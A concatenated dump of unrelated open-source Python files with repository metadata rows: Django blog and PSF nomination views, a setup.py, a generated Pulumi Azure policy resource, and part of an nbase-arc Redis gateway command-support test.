except EmptyPage:
page = paginator.page(paginator.num_pages)
except PageNotAnInteger:
page = paginator.page(1)
posts = page.object_list
context = {
'posts': posts,
'page': page,
}
return render(request, 'blog/post_list.html', context=context)
def post_detail(request, pk=None):
post = get_object_or_404(Post, pk=pk)
texts_tag = BlogTokenize(post.text).tokenize()
return render(request, 'blog/post.html', context={'post':post, 'texts_tag':texts_tag})
| 35.222222
| 90
| 0.592008
|
b017c8c5d23a64b9bc394f89d6d076adb3d08138
| 4,880
|
py
|
Python
|
nominations/views.py
|
berinhard/pythondotorg
|
c199ae139470b333e829b337c3409eda3c5841c8
|
[
"Apache-2.0"
] | 2
|
2021-04-06T16:22:51.000Z
|
2021-05-04T13:48:42.000Z
|
nominations/views.py
|
vishalsingha/pythondotorg
|
af59bc03f63cdea16b0f2bd98aae2dcec713c4c1
|
[
"Apache-2.0"
] | 7
|
2020-06-06T01:45:27.000Z
|
2021-12-13T20:39:27.000Z
|
nominations/views.py
|
vishalsingha/pythondotorg
|
af59bc03f63cdea16b0f2bd98aae2dcec713c4c1
|
[
"Apache-2.0"
] | 1
|
2021-08-21T10:36:44.000Z
|
2021-08-21T10:36:44.000Z
|
from django.contrib import messages
from django.views.generic import CreateView, UpdateView, DetailView, ListView
from django.urls import reverse
from django.http import Http404
from pydotorg.mixins import LoginRequiredMixin
from .models import Nomination, Nominee, Election
from .forms import NominationForm, NominationCreateForm
class ElectionsList(ListView):
model = Election
class NominationMixin:
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
self.election = Election.objects.get(slug=self.kwargs["election"])
context["election"] = self.election
return context
class NomineeList(NominationMixin, ListView):
template_name = "nominations/nominee_list.html"
def get_queryset(self, *args, **kwargs):
election = Election.objects.get(slug=self.kwargs["election"])
if election.nominations_complete or self.request.user.is_superuser:
return Nominee.objects.filter(
accepted=True, approved=True, election=election
).exclude(user=None)
elif self.request.user.is_authenticated:
return Nominee.objects.filter(user=self.request.user)
class NomineeDetail(NominationMixin, DetailView):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.visible(user=request.user):
raise Http404
context = self.get_context_data(object=self.object)
return self.render_to_response(context)
def get_queryset(self):
election = Election.objects.get(slug=self.kwargs["election"])
queryset = Nominee.objects.filter(election=election).select_related()
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationCreate(LoginRequiredMixin, NominationMixin, CreateView):
model = Nomination
login_message = "Please login to make a nomination."
def get_form_kwargs(self):
kwargs = super(NominationCreate, self).get_form_kwargs()
kwargs.update({"request": self.request})
return kwargs
def get_form_class(self):
election = Election.objects.get(slug=self.kwargs["election"])
if election.nominations_complete:
messages.error(
self.request, f"Nominations for {election.name} Election are closed"
)
raise Http404(f"Nominations for {election.name} Election are closed")
return NominationCreateForm
def get_success_url(self):
return reverse(
"nominations:nomination_detail",
kwargs={"election": self.object.election.slug, "pk": self.object.id},
)
def form_valid(self, form):
form.instance.nominator = self.request.user
form.instance.election = Election.objects.get(slug=self.kwargs["election"])
if form.cleaned_data.get("self_nomination", False):
try:
nominee = Nominee.objects.get(
user=self.request.user, election=form.instance.election
)
except Nominee.DoesNotExist:
nominee = Nominee.objects.create(
user=self.request.user,
election=form.instance.election,
accepted=True,
)
form.instance.nominee = nominee
form.instance.accepted = True
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationEdit(LoginRequiredMixin, NominationMixin, UpdateView):
model = Nomination
form_class = NominationForm
def get_success_url(self):
next_url = self.request.POST.get("next")
if next_url:
return next_url
elif self.object.pk:
return reverse(
"nominations:nomination_detail",
kwargs={"election": self.object.election.slug, "pk": self.object.id},
)
else:
return super().get_success_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationView(DetailView):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.visible(user=request.user):
raise Http404
context = self.get_context_data(object=self.object)
context["editable"] = self.object.editable(user=self.request.user)
return self.render_to_response(context)
def get_queryset(self):
queryset = Nomination.objects.select_related()
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
| 33.424658
| 85
| 0.654098
|
56a796f40d600cca14a9163b05c44f3db5af6d9a
| 1,260
|
py
|
Python
|
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import io
import os
VERSION = "0.0.1"
def get_long_description():
with io.open(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "README.md"),
encoding="utf8",
) as fp:
return fp.read()
setup(
name="iframe-shot",
description="Grab screenshot of IFrame.",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Tony Hirst",
version=VERSION,
license="MIT License",
packages=find_packages(),
install_requires=[
"ipython",
"selenium"
],
extras_require={},
entry_points="""
""",
url="https://github.com/innovationOUtside/iframe-shot",
project_urls={
"Source code": "https://github.com/innovationOUtside/iframe-shot",
"Issues": "https://github.com/innovationOUtside/iframe-shot/issues",
},
python_requires=">=3.6",
classifiers=[
"Topic :: Database",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
zip_safe=False,
)
| 26.808511
| 78
| 0.619048
|
3fa22831fdbfdb00bcadbb594f8f2ade1ea08ba1
| 7,529
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['PolicySetDefinition']
class PolicySetDefinition(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
metadata: Optional[Any] = None,
parameters: Optional[Any] = None,
policy_definitions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PolicyDefinitionReferenceArgs']]]]] = None,
policy_set_definition_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
The policy set definition.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The policy set definition description.
:param pulumi.Input[str] display_name: The display name of the policy set definition.
:param Any metadata: The policy set definition metadata.
:param Any parameters: The policy set definition parameters that can be used in policy definition references.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PolicyDefinitionReferenceArgs']]]] policy_definitions: An array of policy definition references.
:param pulumi.Input[str] policy_set_definition_name: The name of the policy set definition to create.
:param pulumi.Input[str] policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn, and Custom.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
__props__['display_name'] = display_name
__props__['metadata'] = metadata
__props__['parameters'] = parameters
if policy_definitions is None:
raise TypeError("Missing required property 'policy_definitions'")
__props__['policy_definitions'] = policy_definitions
if policy_set_definition_name is None:
raise TypeError("Missing required property 'policy_set_definition_name'")
__props__['policy_set_definition_name'] = policy_set_definition_name
__props__['policy_type'] = policy_type
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:authorization/latest:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20170601preview:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20180501:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190101:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190601:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190901:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20200301:PolicySetDefinition")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PolicySetDefinition, __self__).__init__(
'azure-nextgen:authorization/v20180301:PolicySetDefinition',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PolicySetDefinition':
"""
Get an existing PolicySetDefinition resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return PolicySetDefinition(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The policy set definition description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
The display name of the policy set definition.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def metadata(self) -> pulumi.Output[Optional[Any]]:
"""
The policy set definition metadata.
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy set definition.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Any]]:
"""
The policy set definition parameters that can be used in policy definition references.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="policyDefinitions")
def policy_definitions(self) -> pulumi.Output[Sequence['outputs.PolicyDefinitionReferenceResponse']]:
"""
An array of policy definition references.
"""
return pulumi.get(self, "policy_definitions")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of policy definition. Possible values are NotSpecified, BuiltIn, and Custom.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource (Microsoft.Authorization/policySetDefinitions).
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.550296
| 624
| 0.665427
|
9a0e21107512af7795504a162c9d71a9fc65add8
| 29,358
|
py
|
Python
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 176
|
2015-12-30T08:44:30.000Z
|
2022-03-15T08:10:39.000Z
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 35
|
2016-03-24T08:29:51.000Z
|
2021-12-09T20:06:39.000Z
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 65
|
2015-12-30T09:05:13.000Z
|
2022-03-15T08:10:43.000Z
|
import redis
def do_commands(conn, GW=True):
r = conn.do_generic_request
assert_equal = redis.rr_assert_equal
assert_subs = redis.rr_assert_substring
key = 'commands_genericxxxxxxxkey'
key2 = 'commands_genericxxxxxxkey2'
dest = 'commands_generic_xxxxxdest'
try:
# | APPEND | O | |
r('del', key)
r('APPEND', key, '1')
r('APPEND', key, '2')
assert_equal('12', r('get', key))
# | ASKING | X | |
resp = r('ASKING')
assert(resp.startswith('ERR Unsupported'))
# | AUTH | X | |
resp = r('AUTH', 'passwd')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR Client sent'))
# | BGREWRITEAOF | X | |
resp = r('BGREWRITEAOF')
assert(resp.startswith('ERR Unsupported'))
# | BGSAVE | X | |
resp = r('BGSAVE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('Background'))
# | BITCOUNT | O | |
r('set', key, 'foobar')
resp = r('BITCOUNT', key)
assert(resp == 26)
# | BITFIELD | O | Available since 1.4 |
r('del', key)
resp = r('BITFIELD', key, 'incrby', 'i5', 100, 1, 'get', 'u4', 0)
assert(resp == [1,0])
# | BITOP | X | |
r('set', key, 'foobar')
r('set', key2, 'abcdef')
resp = r('BITOP', 'AND', dest, key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 6)
# | BITPOS | O | |
r('set', key, '\xff\xf0\x00')
resp = r('BITPOS', key, 0)
assert(resp == 12)
# | BLPOP | X | |
resp = r('BLPOP', key, 0)
assert(resp.startswith('ERR Unsupported'))
# | BRPOP | X | |
resp = r('BRPOP', key, 0)
assert(resp.startswith('ERR Unsupported'))
# | BRPOPLPUSH | X | |
resp = r('BRPOPLPUSH', key, dest, 0)
assert(resp.startswith('ERR Unsupported'))
# | CLIENT | X | |
resp = r('CLIENT', 'LIST')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('id='))
# | CLUSTER | X | |
resp = r('CLUSTER', 'info')
assert(resp.startswith('ERR Unsupported'))
# | COMMAND | X | |
resp = r('COMMAND')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) > 0)
# | CONFIG | X | |
resp = r('CONFIG', 'get', 'save')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2) # ['save', '']
# | CRC16 | O | |
r('del', key)
resp = r('CRC16', key, 'abcd')
assert(resp == 43062)
# | DBSIZE | O | returns aggregated dbsize |
r('set', key, '1')
resp = r('DBSIZE')
assert(resp >= 1)
# | DEBUG | X | |
if GW:
resp = r('DEBUG', 'object', key)
assert(resp.startswith('ERR Unsupported'))
else:
pass # integration test use 'debug'
# | DECR | O | |
r('set', key, 10)
resp = r('DECR', key)
assert(resp == 9)
# | DECRBY | O | |
r('set', key, 10)
resp = r('DECRBY', key, 2)
assert(resp == 8)
# | DEL | O | |
r('set', key, 'babe')
r('DEL', key)
resp = r('exists', key)
assert(resp == 0)
# | DISCARD | X | |
resp = r('DISCARD')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR DISCARD'))
# | DUMP | O | |
r('set', key, 1)
dump = r('DUMP', key)
resp = r('del', key)
assert(resp == 1)
r('restore', key, 0, dump)
resp = r('get', key)
assert(resp == '1')
# | ECHO | X | |
resp = r('ECHO', 'hihi')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'hihi')
# | EVAL | X | |
resp = r('EVAL', 'return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}', 2, key, key2, 'first', 'second')
assert(resp.startswith('ERR Unsupported'))
# | EVALSHA | X | |
resp = r('EVALSHA', 'fd758d1589d044dd850a6f05d52f2eefd27f033f', 1, key)
assert(resp.startswith('ERR Unsupported'))
# | EXEC | X | |
resp = r('EXEC')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR EXEC'))
# | EXISTS | O | |
r('del', key)
r('set', key, 1)
resp = r('EXISTS', key)
assert(resp == 1)
# | EXPIRE | O | |
r('set', key, 1)
resp = r('EXPIRE', key, 1)
assert(resp == 1)
# | EXPIREAT | O | |
r('set', key, 1)
resp = r('EXPIREAT', key, 1293840000)
assert(resp == 1)
# | FLUSHALL | X | |
resp = r('FLUSHALL')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('OK'))
# | FLUSHDB | X | |
resp = r('FLUSHDB')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('OK'))
# | GEOADD | O | Available since 1.4 |
# | GEODIST | O | Available since 1.4 |
# | GEOHASH | O | Available since 1.4 |
# | GEOPOS | O | Available since 1.4 |
# | GEORADIUS | O | Available since 1.4 (no store option) |
# | GEORADIUSBYMEMBER | O | Available since 1.4 (no store option) |
r('del', key)
resp = r('GEOADD', key, 13.361389, 38.115556, 'Palermo', 15.087269, 37.502669, 'Catania')
assert(resp == 2)
resp = r('GEODIST', key, 'Palermo', 'Catania')
assert(float(resp) > 166274 and float(resp) < 166275) # 66274.1516
resp = r('GEOHASH', key, 'Palermo', 'Catania')
assert(len(resp) == 2)
resp = r('GEOPOS', key, 'Palermo', 'Catania', 'NonExisting')
assert(len(resp) == 3)
resp = r('GEORADIUS', key, 15, 37, 200, 'km', 'WITHDIST')
assert(len(resp) == 2)
resp = r('GEORADIUS', key, 15, 37, 200, 'km', 'WITHDIST', 'STORE', key2)
assert(resp.startswith('ERR STORE'))
resp = r('GEORADIUSBYMEMBER', key, 'Palermo', 1000, 'km')
assert(len(resp) == 2)
resp = r('GEORADIUSBYMEMBER', key, 'Palermo', 200, 'km', 'STORE', key2)
assert(resp.startswith('ERR STORE'))
# | GET | O | |
r('set', key, 'gg')
resp = r('GET', key)
assert(resp == 'gg')
# | GETBIT | O | |
r('setbit', key, 7, 1)
resp = r('GETBIT', key, 7)
assert(resp == 1)
# | GETRANGE | O | |
r('set', key, "This is a string")
resp = r('GETRANGE', key, 0, 3)
assert(resp == "This")
# | GETSET | O | |
r('set', key, 'oldval')
resp = r('GETSET', key, 'newval')
assert(resp == 'oldval')
# | HDEL | O | |
# | HEXISTS | O | |
# | HGET | O | |
# | HGETALL | O | |
# | HINCRBY | O | |
# | HINCRBYFLOAT | O | |
# | HKEYS | O | |
# | HLEN | O | |
# | HMGET | O | |
# | HMSET | O | |
r('del', key)
resp = r('HSET', key, 'k1', 'v1')
assert(resp == 1)
resp = r('HGET', key, 'k1')
assert(resp == 'v1')
resp = r('HGETALL', key)
assert(len(resp) == 2)
resp = r('HEXISTS', key, 'kkk')
assert(resp == 0)
r('hset', key, 'count', 100)
resp = r('HINCRBY', key, 'count', 2)
assert(resp == 102)
resp = r('HINCRBYFLOAT', key, 'count', 2.0)
assert(float(resp) == 104.0)
resp = r('HKEYS', key)
assert(len(resp) == 2)
resp = r('HLEN', key)
assert(resp == 2)
resp = r('HMGET', key, 'k1', 'k2')
assert(len(resp) == 2)
resp = r('HMSET', key, 'kk1', 'vv1', 'kk2', 'vv2')
assert(resp == 'OK')
# | HOST: | X | |
# skip
# | HSCAN | O | Available since 1.4 |
# | HSET | O | |
# | HSETNX | O | |
# | HSTRLEN | O | Available since 1.4 |
# | HVALS | O | |
r('del', key)
resp = r('HSET', key, 'k1', 'v11')
assert(resp == 1)
resp = r('HSCAN', key, 0)
assert(len(resp) == 2)
resp = r('HSETNX', key, 'k1', 'v2')
assert(resp == 0)
resp = r('HSTRLEN', key, 'k1')
assert(resp == 3)
resp = r('HVALS', key)
assert(len(resp) == 1)
# | INCR | O | |
# | INCRBY | O | |
# | INCRBYFLOAT | O | |
r('set', key, 100)
resp = r('INCR', key)
assert(resp == 101)
resp = r('INCRBY', key, 1000)
assert(resp == 1101)
resp = r('INCRBYFLOAT', key, 0.12)
assert(float(resp) == 1101.12)
# | INFO | O | returns cluster info |
resp = r('INFO')
assert(len(resp) > 500)
# | KEYS | X | |
resp = r('KEYS', 'nosuchkey_may_be.really.ok???')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 0)
# | LASTSAVE | X | |
resp = r('LASTSAVE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp > 1500000000)
# | LATENCY | X | |
resp = r('LATENCY')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR wrong number'))
# | LINDEX | O | |
# | LINSERT | O | |
# | LLEN | O | |
# | LPOP | O | |
# | LPUSH | O | |
# | LPUSHX | O | |
# | LRANGE | O | |
# | LREM | O | |
# | LSET | O | |
# | LTRIM | O | |
r('del', key)
resp = r('LPUSH', key, 'v2')
assert(resp == 1)
resp = r('LPUSHX', key, 'v1')
assert(resp == 2)
resp = r('LINDEX', key, 1)
assert(resp == 'v2')
resp = r('LINSERT', key, 'BEFORE', 'v2', 'mid')
assert(resp == 3)
resp = r('LLEN', key)
assert(resp == 3)
resp = r('LRANGE', key, 0, 0)
assert(len(resp) == 1 and resp[0] == 'v1')
resp = r('LREM', key, 0, 'v1')
assert(resp == 1)
resp = r('LSET', key, 1, 'MID')
assert(resp == 'OK')
resp = r('LTRIM', key, 1, -1)
assert(resp == 'OK')
resp = r('LPOP', key)
assert(resp == 'MID')
# | MGET | O | |
r('set', key, 1)
r('set', key2, 2)
resp = r('MGET', key, key2)
assert(len(resp) == 2)
# | MIGRATE | X | |
resp = r('MIGRATE', 'localhost', '7009', key)
assert(resp.startswith('ERR Unsupported'))
# | MONITOR | X | |
# skip
# | MOVE | X | |
resp = r('MOVE', key, 1)
assert(resp.startswith('ERR Unsupported'))
# | MSET | O | |
resp = r('MSET', key, 1, key2, 2)
assert(resp == 'OK')
# | MSETNX | X | |
r('del', key)
r('del', key2)
resp = r('MSETNX', key, 1, key2, 2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1) # all keys are set
# | MULTI | X | |
resp = r('MULTI')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
resp = r('discard')
assert(resp == 'OK')
# | OBJECT | O | |
r('set', key, 'this is test expected to be uni..dque')
resp = r('OBJECT', 'REFCOUNT', key)
assert(resp == 1)
# | PERSIST | O | |
r('set', key, 100)
resp = r('PERSIST', key)
assert(resp == 0) # has no associated ttl
# | PEXPIRE | O | |
r('set', key, 100)
resp = r('PEXPIRE', key, 10000)
assert(resp == 1)
# | PEXPIREAT | O | |
r('set', key, 200)
resp = r('PEXPIREAT', key, 1000000)
assert(resp == 1)
# | PFADD | O | Available since 1.4 |
# | PFCOUNT | O | Available since 1.4 (single key only) |
r('del', key)
resp = r('PFADD', key, 1, 2, 3, 4, 5, 6)
assert (resp == 1)
resp = r('PFCOUNT', key)
assert (resp == 6)
# | PFDEBUG | X | |
resp = r('PFDEBUG', key)
assert(resp.startswith('ERR Unsupported'))
# | PFMERGE | X | |
r('del', key)
r('del', key2)
r('pfdadd', key, 1, 2, 3, 4, 5)
resp = r('PFMERGE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | PFSELFTEST | X | |
resp = r('PFSELFTEST', 'xbac') # bad arg for purpose
assert(resp.startswith('ERR Unsupported'))
# | PING | O | gateway ping |
resp = r('PING')
assert(resp == 'PONG')
# | POST | X | |
# skip
# | PSETEX | O | |
r('del', key)
resp = r('PSETEX', key, 10000, 'val')
assert(resp == 'OK')
# | PSUBSCRIBE | X | |
resp = r('PSUBSCRIBE', 'h?llo')
assert(resp.startswith('ERR Unsupported'))
# | PSYNC | X | |
resp = r('PSYNC', 'runid', 1000)
assert(resp.startswith('ERR Unsupported'))
# | PTTL | O | |
r('set', key, 1)
resp = r('PTTL', key)
assert(resp == -1)
# | PUBLISH | X | |
resp = r('PUBLISH', 'chan', 'message')
assert(resp.startswith('ERR Unsupported'))
# | PUBSUB | X | |
resp = r('PUBSUB', 'CHANNELS')
assert(resp.startswith('ERR Unsupported'))
# | PUNSUBSCRIBE | X | |
resp = r('PUNSUBSCRIBE')
assert(resp.startswith('ERR Unsupported'))
# | QUIT | O | |
# skip
# | RANDOMKEY | X | |
r('set', key, 100)
resp = r('RANDOMKEY')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) > 0)
# | READONLY | X | |
resp = r('READONLY')
assert(resp.startswith('ERR Unsupported'))
# | READWRITE | X | |
resp = r('READWRITE')
assert(resp.startswith('ERR Unsupported'))
# | RENAME | X | |
r('set', key, 1)
r('del', key2)
resp = r('RENAME', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | RENAMENX | X | |
r('set', key, 1)
r('del', key2)
resp = r('RENAMENX', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
# | REPLCONF | X | |
resp = r('REPLCONF', 'option', 'value')
assert(resp.startswith('ERR Unsupported'))
# | RESTORE | O | |
r('del', key)
resp = r('RESTORE', key, 0, '\n\x17\x17\x00\x00\x00\x12\x00\x00\x00\x03\x00\x00\xc0\x01\x00\x04\xc0\x02\x00\x04\xc0\x03\x00\xff\x04\x00u#<\xc0;.\xe9\xdd')
assert(resp == 'OK')
resp = r('type', key)
assert(resp == 'list')
# | RESTORE-ASKING | X | |
r('del', key)
resp = r('RESTORE-ASKING', key, 0, '\n\x17\x17\x00\x00\x00\x12\x00\x00\x00\x03\x00\x00\xc0\x01\x00\x04\xc0\x02\x00\x04\xc0\x03\x00\xff\x04\x00u#<\xc0;.\xe9\xdd')
assert(resp.startswith('ERR Unsupported'))
# | ROLE | X | |
resp = r('ROLE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3)
# | RPOP | O | |
r('del', key)
r('rpush', key, 'v1')
r('rpush', key, 'v2')
resp = r('RPOP', key)
assert(resp == 'v2')
# | RPOPLPUSH | X | |
r('del', key)
r('del', key2)
resp = r('RPOPLPUSH', key, key2)
if GW:
assert (resp.startswith('ERR Unsupported'))
else:
assert (resp == None)
# | RPUSH | O | |
r('del', key)
resp = r('RPUSH', key, 'v')
assert(resp == 1)
# | RPUSHX | O | |
r('del', key)
r('rpush', key, 'v1')
resp = r('RPUSHX', key, 'v2')
assert(resp == 2)
# | SADD | O | |
r('del', key)
resp = r('SADD', key, 'v1')
assert(resp == 1)
# | SAVE | X | |
resp = r('SAVE')
assert(resp.startswith('ERR Unsupported'))
# | SCAN | O | Available since 1.4 |
resp = r('SCAN', 0)
assert(len(resp) == 2)
# | SCARD | O | |
r('del', key)
r('sadd', key, 'v')
resp = r('SCARD', key)
assert(resp == 1)
# | SCRIPT | X | |
resp = r('SCRIPT', 'exists')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 0)
# | SDIFF | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'c', 'd')
resp = r('SDIFF', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | SDIFFSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'c', 'd')
resp = r('SDIFFSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SELECT | X | |
resp = r('SELECT', 0)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | SET | O | |
resp = r('SET', key, 100)
assert(resp == 'OK')
# | SETBIT | O | |
r('set', key, 7)
resp = r('SETBIT', key, 3, 0)
assert(resp == 1)
# | SETEX | O | |
resp = r('SETEX', key, 10, "hello")
assert(resp == 'OK')
# | SETNX | O | |
r('del', key)
resp = r('SETNX', key, 100)
assert(resp == 1)
# | SETRANGE | O | |
r('set', key, 'Hello World')
resp = r('SETRANGE', key, 6, 'Redis')
assert(resp == 11)
# | SHUTDOWN | X | |
resp = r('SHUTDOWN')
assert(resp.startswith('ERR Unsupported'))
# | SINTER | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'b', 'c')
resp = r('SINTER', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | SINTERSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
resp = r('SINTERSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SISMEMBER | O | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SISMEMBER',key, 'c')
assert(resp == 1)
# | SLAVEOF | X | |
resp = r('SLAVEOF', 'localhost', 1234)
assert(resp.startswith('ERR Unsupported'))
# | SLOWLOG | X | |
resp = r('SLOWLOG', 'get', 1)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(not str(resp).startswith('ERR'))
# | SMEMBERS | O | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SMEMBERS', key)
assert(len(resp) == 3)
# | SMOVE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'b', 'c')
resp = r('SMOVE', key, key2, 'a')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
